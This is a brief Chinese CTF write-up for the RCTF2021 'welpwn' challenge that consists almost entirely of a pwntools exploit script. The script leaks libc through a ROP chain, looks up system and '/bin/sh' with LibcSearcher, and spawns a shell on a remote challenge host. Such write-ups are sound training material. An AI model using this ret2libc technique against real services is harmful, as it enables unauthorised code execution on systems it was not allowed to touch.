[RCTF2021]welpwn
题目分析

这一题拿来测试LibcSearcher的,没感情,直接上EXP:
from pwn import * from LibcSearcher import *
r = remote('61.147.171.105',63406) context(os = 'linux',log_level = "debug") pop_rdi = 0x4008a3 pop_rsi = 0x4008a1 pop_4 = 0x40089c main_addr = 0x4007CD elf = ELF("./welpwn") puts_plt = elf.plt['puts'] read_got = elf.got['read'] r.recvuntil("Welcome to RCTF\n") payload = b'a' * 0x18 + p64(pop_4) + p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(main_addr) r.sendline(payload)
r.recvuntil(b'a' * 0x18) r.recv(3) read_addr = u64(r.recv(6).ljust(8,b'\x00')) print("read:",hex(read_addr)) libc = LibcSearcher("read", read_addr)
libc_base = read_addr - libc.dump("read") system = libc_base + libc.dump("system") print("system:",hex(system)) bin_sh = libc_base + libc.dump("str_bin_sh") print("bin_sh:",hex(bin_sh)) payload =b'a' * 0x18 +p64(pop_4) + p64(pop_rdi) + p64(bin_sh) + p64(system) r.sendline(payload) r.interactive()
|
